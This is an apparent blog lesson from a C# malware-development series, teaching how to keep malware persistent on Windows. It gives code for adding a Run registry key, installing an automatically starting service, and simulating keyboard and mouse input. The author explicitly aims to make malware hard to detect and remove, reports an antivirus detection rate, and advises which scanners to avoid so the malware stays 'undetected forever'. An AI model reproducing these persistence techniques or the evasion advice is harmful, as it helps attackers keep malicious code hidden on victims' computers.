Lesson 14: Maintaining Persistence with Malware Development
Follow XIT on medium & UglyCompany on Telegram for more..
Below is the Topics List for Lesson 14:
14. Maintaining Persistence:
⇢ Executing Files on System Startup
⇢ Installing Driver/Services
⇢ Simulating Mouse and Keyboard Input
In this lesson, we will discuss how to maintain persistence with malware development. Persistence is crucial for malware as it ensures that it remains on the infected device, even after rebooting or shutting down. We will cover topics such as executing files on system startup, installing drivers/services, and simulating mouse and keyboard input. With this knowledge, you will be able to develop a malware that is difficult to detect and remove from the infected device. This will be the last topic of our C# Malware development series.
Topic 1: Executing Files on System Startup
To execute a file on system startup, we can use the Microsoft.Win32 namespace to create a registry key under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, which will execute a specified file when the system starts up.
// startup
// define the path to the file you want to execute on startup
string filePath = @"C:\Path\To\My\File.exe";
// add the file to the registry key to execute on startup
RegistryKey rk = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
rk.SetValue(Path.GetFileNameWithoutExtension(filePath), filePath);Topic 2: Installing Driver/Services
To install a driver or service in C#, you can use the System.Management namespace to create a new service object and set its properties, then use the ServiceController class to install and start the service.
// driver install
// define the properties of the service to install
ManagementClass mc = new ManagementClass("Win32_Service");
ManagementObject service = mc.CreateInstance();
service["Name"] = "MyxitService";
service["DisplayName"] = "My Xit Service";
service["PathName"] = @"C:\Path\To\My\xitService.exe";
service["ServiceType"] = 16;
service["StartMode"] = "Automatic";
service["DesktopInteract"] = false;
service.Put();
// install and start the service
ServiceController sc = new ServiceController("MyxitService");
sc.Start();Topic 3: Simulating Mouse and Keyboard Input
The Windows Input Simulator library, which provides a simple API for simulating input events, can be used to simulate mouse and keyboard input in C#.
// mouse - keyb simulation
// create a new input simulator instance
InputSimulator sim = new InputSimulator();
// simulate a key press and release
sim.Keyboard.KeyPress(VirtualKeyCode.VK_A);
// simulate a mouse click
sim.Mouse.LeftButtonClick();
// simulate mouse movement
sim.Mouse.MoveMouseTo(100, 100);Finally, I compiled all the topics of lesson 14 & it was detected by 1 out of 26 antivirus scans.
Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:
Conclusion
In conclusion, advanced malware development requires techniques for maintaining persistence, installing drivers/services, and simulating mouse and keyboard input. Understanding how to use these techniques in C# can help students gain a better understanding of how malware works and how to protect themselves from it. And here we end up with out C# malware series.
